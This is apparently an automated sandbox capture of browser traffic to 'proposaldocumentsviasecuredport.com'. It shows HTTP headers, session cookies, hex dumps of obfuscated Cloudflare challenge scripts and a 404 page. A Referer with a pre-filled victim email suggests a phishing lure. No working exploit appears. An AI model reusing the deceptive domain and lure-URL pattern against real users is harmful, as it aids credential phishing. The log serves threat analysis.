                                                        2025-03-25 20:29:25 UTC638INData Raw: 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f
                                                        Data Ascii: nt.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='no
                                                        2025-03-25 20:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449737104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:25 UTC967OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
                                                        2025-03-25 20:29:25 UTC928INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:25 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 8429
                                                        Connection: close
                                                        cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                        x-content-type-options: nosniff
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PrgHxBvJRkGQ3PyAk%2F03Iud9Z8l9LqDOyYoHlajmUj92aQETxLTsjfR4S3UT%2B21BNY1tk5qyN5jU3aUC6dee1YD42uQkxyhThbYCuY%2Bki32X4TTUswsVS76C4wMgs19xrWkydxtOgelX30Dd1CzSipDVbZe6%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926129088cc0b432-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=103700&min_rtt=102258&rtt_var=23077&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1561&delivery_rate=36427&cwnd=228&unsent_bytes=0&cid=24a2d5c21fcb52c8&ts=262&x=0"
                                                        2025-03-25 20:29:25 UTC441INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 73 2c 76 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 33 35 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 56 28 32 39 38 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 30 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 33 36 35 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 35 38 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 39 30 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 56 28 33 34 30 29 29 2f 37 29 2b 2d 70
                                                        Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=-parseInt(V(350))/1+parseInt(V(298))/2+-parseInt(V(308))/3*(-parseInt(V(365))/4)+-parseInt(V(358))/5+-parseInt(V(390))/6*(parseInt(V(340))/7)+-p
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 20 58 3d 57 2c 65 3d 53 74 72 69 6e 67 5b 58 28 33 35 39 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 45 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 45 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 59 29 7b 72 65 74 75 72 6e 20 59 3d 62 2c 59 28 33 33 35 29 5b 59 28 33 35 31 29 5d 28 46 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 5a 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 55 29 7b 69 66 28 5a 3d 58 2c 45 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 49 3d 7b 7d 2c 4a 3d 7b 7d 2c 4b 3d 27 27 2c 4c 3d 32 2c 4d 3d 33 2c 4e 3d 32 2c 4f 3d 5b 5d 2c 50 3d 30 2c 51 3d 30 2c 52 3d 30 3b 52 3c 45 5b 5a 28 33 37 37 29 5d 3b 52 2b 3d 31 29 69 66 28
                                                        Data Ascii: X=W,e=String[X(359)],f={'h':function(E){return E==null?'':f.g(E,6,function(F,Y){return Y=b,Y(335)[Y(351)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(377)];R+=1)if(
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 2c 4e 29 2c 4e 2b 2b 29 2c 64 65 6c 65 74 65 20 4a 5b 4b 5d 7d 65 6c 73 65 20 66 6f 72 28 55 3d 49 5b 4b 5d 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 7c 31 2e 36 32 26 55 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 4c 2d 2d 2c 4c 3d 3d 30 26 26 4e 2b 2b 7d 66 6f 72 28 55 3d 32 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 55 26 31 2e 30 39 7c 50 3c 3c 31 2e 36 34 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 29 7b 4f 5b 5a 28 34 30 32 29 5d 28 47 28 50 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 51 2b
                                                        Data Ascii: ,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=P<<1|1.62&U,Q==F-1?(Q=0,O[Z(402)](G(P)),P=0):Q++,U>>=1,H++);L--,L==0&&N++}for(U=2,H=0;H<N;P=U&1.09|P<<1.64,F-1==Q?(Q=0,O[Z(402)](G(P)),P=0):Q++,U>>=1,H++);for(;;)if(P<<=1,F-1==Q){O[Z(402)](G(P));break}else Q+
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 28 33 35 31 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 4c 5b 61 32 28 34 30 32 29 5d 28 55 29 2c 48 5b 4a 2b 2b 5d 3d 4d 2b 55 5b 61 32 28 33 35 31 29 5d 28 30 29 2c 49 2d 2d 2c 4d 3d 55 2c 49 3d 3d 30 26 26 28 49 3d 4d 61 74 68 5b 61 32 28 33 34 39 29 5d 28 32 2c 4b 29 2c 4b 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 58 28 33 37 38 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 6b 3d 7b 7d 2c 6b 5b 57 28 33 34 32 29 5d 3d 27 6f 27 2c 6b 5b 57 28 33 34 31 29 5d 3d 27 73 27 2c 6b 5b 57 28 34 30 35 29 5d 3d 27 75 27 2c 6b 5b 57 28 34 30 31 29 5d 3d 27 7a 27 2c 6b 5b 57 28 33 34 35 29 5d 3d 27 6e 27 2c 6b 5b 57 28 33 31 30 29 5d 3d 27 49 27 2c 6b 5b 57 28 34 30 39 29 5d 3d 27 62 27 2c 6c 3d 6b 2c 68 5b 57 28 33 32 31 29 5d 3d 66 75 6e 63 74 69
                                                        Data Ascii: (351)](0);else return null;L[a2(402)](U),H[J++]=M+U[a2(351)](0),I--,M=U,I==0&&(I=Math[a2(349)](2,K),K++)}}},g={},g[X(378)]=f.h,g}(),k={},k[W(342)]='o',k[W(341)]='s',k[W(405)]='u',k[W(401)]='z',k[W(345)]='n',k[W(310)]='I',k[W(409)]='b',l=k,h[W(321)]=functi
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 4b 5b 61 68 28 33 39 39 29 5d 28 61 68 28 33 30 39 29 2c 4a 29 2c 4b 5b 61 68 28 33 31 34 29 5d 3d 32 35 30 30 2c 4b 5b 61 68 28 33 37 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 4c 3d 7b 7d 2c 4c 5b 61 68 28 33 38 39 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 38 39 29 5d 2c 4c 5b 61 68 28 33 35 37 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 35 37 29 5d 2c 4c 5b 61 68 28 33 30 33 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 30 33 29 5d 2c 4c 5b 61 68 28 33 38 36 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 34 38 29 5d 2c 4d 3d 4c 2c 4e 3d 7b 7d 2c 4e 5b 61 68 28 33 39 38 29 5d 3d 48 2c 4e 5b 61 68 28 33 38 38 29 5d 3d 4d 2c 4e 5b 61 68 28 33 33 36 29 5d 3d 61 68 28 33 39 36 29 2c 4b 5b 61 68 28 33 34 37 29 5d
                                                        Data Ascii: K[ah(399)](ah(309),J),K[ah(314)]=2500,K[ah(371)]=function(){},L={},L[ah(389)]=h[ah(392)][ah(389)],L[ah(357)]=h[ah(392)][ah(357)],L[ah(303)]=h[ah(392)][ah(303)],L[ah(386)]=h[ah(392)][ah(348)],M=L,N={},N[ah(398)]=H,N[ah(388)]=M,N[ah(336)]=ah(396),K[ah(347)]
                                                        2025-03-25 20:29:25 UTC1369INData Raw: 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 6f 70 65 6e 2c 72 65 61 64 79 53 74 61 74 65 2c 73 79 6d 62 6f 6c 2c 70 75 73 68 2c 69 6e 64 65 78 4f 66 2c 78 68 72 2d 65 72 72 6f 72 2c 75 6e 64 65 66 69 6e 65 64 2c 70 6f 73 74 4d 65 73 73 61 67 65 2c 65 76 65 6e 74 2c 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 62 6f 6f 6c 65 61 6e 2c 73 74 79 6c 65 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 73 70 6c 69 74 2c 38 37 36 35 32 38 4a 49 70 70 50 4a 2c 63 46 50 57 76 2c 2f 69 6e 76 69 73 69 62 6c 65 2f 6a 73 64 2c 36 32 30 46 44 78 41 46 57 2c 6a 6f 69 6e 2c 63 68 6c 41 70 69 52 75 6d 57 69 64 67 65 74 41 67 65 4d 73 2c 37 33 39 38 31 35 32 72 59 63 64 66 57 2c 64 2e 63 6f 6f 6b 69 65 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 73 70 6c 69 63 65 2c 34
                                                        Data Ascii: errorInfoObject,open,readyState,symbol,push,indexOf,xhr-error,undefined,postMessage,event,XMLHttpRequest,boolean,style,contentWindow,split,876528JIppPJ,cFPWv,/invisible/jsd,620FDxAFW,join,chlApiRumWidgetAgeMs,7398152rYcdfW,d.cookie,hasOwnProperty,splice,4
                                                        2025-03-25 20:29:25 UTC1143INData Raw: 5d 5b 61 34 28 33 36 32 29 5d 28 67 5b 45 5d 29 3f 27 61 27 3a 67 5b 45 5d 3d 3d 3d 65 5b 61 34 28 33 33 33 29 5d 3f 27 45 27 3a 21 30 3d 3d 3d 67 5b 45 5d 3f 27 54 27 3a 21 31 3d 3d 3d 67 5b 45 5d 3f 27 46 27 3a 28 46 3d 74 79 70 65 6f 66 20 67 5b 45 5d 2c 61 34 28 33 36 36 29 3d 3d 46 3f 6d 28 65 2c 67 5b 45 5d 29 3f 27 4e 27 3a 27 66 27 3a 6c 5b 46 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 63 2c 65 2c 61 33 29 7b 72 65 74 75 72 6e 20 61 33 3d 57 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 5b 61 33 28 33 35 33 29 5d 26 26 30 3c 63 5b 61 33 28 33 35 33 29 5d 5b 61 33 28 33 31 35 29 5d 5b 61 33 28 33 38 31 29 5d 5b 61 33 28 33 33 31 29 5d 28 65 29 5b 61 33 28 34 30 33 29 5d 28 61 33 28 33 38 33 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63
                                                        Data Ascii: ][a4(362)](g[E])?'a':g[E]===e[a4(333)]?'E':!0===g[E]?'T':!1===g[E]?'F':(F=typeof g[E],a4(366)==F?m(e,g[E])?'N':'f':l[F]||'?')}function m(c,e,a3){return a3=W,e instanceof c[a3(353)]&&0<c[a3(353)][a3(315)][a3(381)][a3(331)](e)[a3(403)](a3(383))}function b(c


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449738104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:25 UTC1143OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        Content-Length: 16611
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://proposaldocumentsviasecuredport.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
                                                        2025-03-25 20:29:25 UTC16384OUTData Raw: 42 4b 67 50 45 53 6e 77 45 69 67 45 58 57 5a 6e 54 6e 7a 70 72 50 53 4d 70 55 65 70 44 75 44 4a 4a 53 77 6e 48 34 70 37 35 4d 2b 35 63 67 70 6c 37 41 6d 5a 35 69 6e 74 70 58 54 67 66 71 4b 4b 70 55 79 4a 70 52 70 4a 4d 4a 67 6e 70 43 4a 6e 32 5a 49 50 79 69 4b 4f 62 36 50 37 35 4c 4b 65 55 39 74 7a 57 66 46 50 32 4c 45 68 65 78 6e 39 34 37 79 44 70 45 67 67 76 44 6c 53 4f 71 70 4e 66 71 63 31 4f 70 31 50 57 6c 70 53 68 67 70 44 50 53 53 50 4c 58 50 44 70 6e 35 70 72 69 6b 70 6e 78 4f 70 73 61 77 55 66 4b 41 6e 55 79 71 67 70 53 61 4f 70 53 5a 6d 72 70 6d 53 70 6e 4f 43 63 2d 67 36 74 65 4d 53 66 53 6e 31 32 65 4b 34 45 4c 24 38 31 37 70 75 50 53 44 30 56 4b 70 77 6b 4b 35 57 63 37 59 43 66 70 6d 38 31 79 4c 75 55 50 70 2d 79 75 63 44 67 78 45 38 79 69 24
                                                        Data Ascii: BKgPESnwEigEXWZnTnzprPSMpUepDuDJJSwnH4p75M+5cgpl7AmZ5intpXTgfqKKpUyJpRpJMJgnpCJn2ZIPyiKOb6P75LKeU9tzWfFP2LEhexn947yDpEggvDlSOqpNfqc1Op1PWlpShgpDPSSPLXPDpn5prikpnxOpsawUfKAnUyqgpSaOpSZmrpmSpnOCc-g6teMSfSn12eK4EL$817puPSD0VKpwkK5Wc7YCfpm81yLuUPp-yucDgxE8yi$
                                                        2025-03-25 20:29:25 UTC227OUTData Raw: 48 50 33 33 58 53 45 62 6e 68 6c 44 67 2d 78 37 6b 6c 67 77 68 2d 6e 32 71 5a 55 4a 50 4d 4e 2d 6e 44 32 35 4a 57 6f 57 53 45 6c 6e 51 33 53 6a 50 50 78 4c 33 70 6c 53 66 2d 6a 58 4e 77 57 67 67 33 6d 44 68 68 50 48 56 41 34 7a 45 48 6d 73 64 6e 70 42 2d 6e 79 4a 52 4e 75 6b 6c 6f 73 73 79 65 34 6d 2b 37 4c 35 70 70 6e 6b 42 62 2b 49 63 4e 2d 42 5a 6b 5a 68 77 6a 36 5a 50 71 58 6b 75 6d 71 6c 34 49 73 75 43 50 63 51 67 6b 31 77 33 54 61 65 72 33 4c 72 54 72 67 70 70 72 4a 46 65 67 2d 58 71 50 70 6e 24 6e 4e 57 55 70 70 70 38 68 6e 77 5a 70 4a 54 57 6d 2d 5a 70 70 70 57 63 6a 4a 5a 70 70 63 65 56 6c 6e 44 70 77 70 51 33 4e 77 45 63 6c 72 61 6f 62 54 75 70 70 70 38 75 70 70
                                                        Data Ascii: HP33XSEbnhlDg-x7klgwh-n2qZUJPMN-nD25JWoWSElnQ3SjPPxL3plSf-jXNwWgg3mDhhPHVA4zEHmsdnpB-nyJRNuklossye4m+7L5ppnkBb+IcN-BZkZhwj6ZPqXkumql4IsuCPcQgk1w3Taer3LrTrgpprJFeg-XqPpn$nNWUppp8hnwZpJTWm-ZpppWcjJZppceVlnDpwpQ3NwEclraobTuppp8upp
                                                        2025-03-25 20:29:25 UTC1315INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:25 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=proposaldocumentsviasecuredport.com; HttpOnly; Secure; SameSite=None
                                                        Set-Cookie: cf_clearance=NR8TDr1rWiYe0g_uPfUU1y1PgxOg5R0XUv8o9MjHwIY-1742934565-1.2.1.1-H9pGY0RVPoAfj4FCkRT6KpY5qtVk3Yl7QD77EnxJP_0EFd4Lx_vXU9FVMwUi7miTyQFBHfiVuSnfLGiVsSwWDf.ImVhbeKXAYg55PurPFUeGlH1FcRRJdjTvEX7yfHPx_k3wxbIhAs6_vjSRk1oUtgYYK6xDorWevV60_ByfVlERID5vdY8dBdhgdIUcV2fSXtiQWydCXwcEsKwuj20gxVWFYMU3trvMcnK5CAJg.5i_jdQINk5P7PqRhooFFUitzBT4ArRybSXpy6p4t_YxcbHO50nhpFmVn3KnsnS_RkpzTiZ9yzuvQOjzSQ9wOuCnxQMjxd1anfPjeAcPMhbmH9FXbz525yERds6pXrhTG7E; Path=/; Expires=Wed, 25-Mar-26 20:29:25 GMT; Domain=proposaldocumentsviasecuredport.com; HttpOnly; Secure; SameSite=None; Partitioned
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UacZhf1BqI%2ByivkJ5qHKc2qj3KfsqhH4Q241FpSqcF%2BR0h0%2FeeTWtNKSBeD18XwpvsfnB%2B%2FBFLpFg3FjC%2BvNXsZ0k%2B0TFUkr3E34y5XvKV8xO7yKkHovpOrg3YvnK5u6vPYsvFA0Qt6g%2Be1MvA7K9JMZgMMig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9261290c5c0f88c3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:25 UTC223INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 37 35 30 26 6d 69 6e 5f 72 74 74 3d 31 30 30 32 39 34 26 72 74 74 5f 76 61 72 3d 32 32 36 35 33 26 73 65 6e 74 3d 31 39 26 72 65 63 76 3d 32 32 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 33 39 32 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 37 31 32 38 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 32 65 61 36 33 39 66 33 66 37 62 66 36 37 35 65 26 74 73 3d 33 35 39 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=101750&min_rtt=100294&rtt_var=22653&sent=19&recv=22&lost=0&retrans=0&sent_bytes=2896&recv_bytes=18392&delivery_rate=37128&cwnd=250&unsent_bytes=0&cid=2ea639f3f7bf675e&ts=359&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449740104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:26 UTC1068OUTGET /favicon.ico HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
                                                        2025-03-25 20:29:26 UTC1127INHTTP/1.1 404 Not Found
                                                        Date: Tue, 25 Mar 2025 20:29:26 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                                                        Pragma: public
                                                        CF-Cache-Status: HIT
                                                        Age: 103391
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9261290ee8636a52-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=111530&min_rtt=105779&rtt_var=30964&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1640&delivery_rate=30231&cwnd=247&unsent_bytes=0&cid=124af88d4635b1c1&ts=285&x=0"
                                                        2025-03-25 20:29:26 UTC242INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77
                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered w
